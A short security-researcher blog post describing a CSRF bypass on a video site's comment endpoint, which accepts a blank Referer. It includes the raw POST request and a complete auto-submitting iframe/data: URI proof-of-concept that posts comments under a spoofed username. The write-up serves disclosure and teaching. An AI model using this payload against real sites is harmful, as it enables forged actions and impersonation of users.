@zseano
UK Security Researcher
A site containing various blog posts, tutorials, tools and information regarding working with me.
Tutorials
Blog Posts
Tools
Contact Information
CSRF 'protection' bypass on xvideos
Read more blogs on BugBountyForum
When commenting on a video on xvideos there’s 0 CSRF tokens sent. The request is:
POST http://www.xvideos.com/video-post-comment/video_id/ HTTP/1.1
user=testuser&comment=testy&test=ok
We can actually spoof user= to be whatever want.
However.. xvideos check if the Referer: is xvideos.com, or blank. If it’s blank, it’ll let it through.
But how can we send a blank referer? This is where our trusty friend data: comes into play.
If you visit
data:text/html, <script>top.location.href='http://www.google.com/';</script>
on chrome, it’ll redirect with no referer and origin as null.
So let’s create an iframe with data: along with our form to submit a post. (replace video_here with videoid below).
<iframe src='data:text/html,<html> <head> <script> function doit() { document.getElementById("myForm").submit(); } setTimeout(doit,2000); </script> </head> <div style="display:none;"> <iframe id="myframe" name="myframe"></iframe> <form id="myForm" name="myForm" action="http://www.xvideos.com/video-post-comment/video_here/" method="POST" target="myframe"> <input type="text" name="user" value="testuser"></input> <input type="text" name="comment" value="testy"></input> <input type="text" name="test" value="ok"></input> </form>'></iframe>
The request:

The response:

Notice thanks to data:, the referer value isn’t there and Origin is “null”, so xvideos let it through. :)
Just checking Referer: is a bad approach to protecting from CSRF!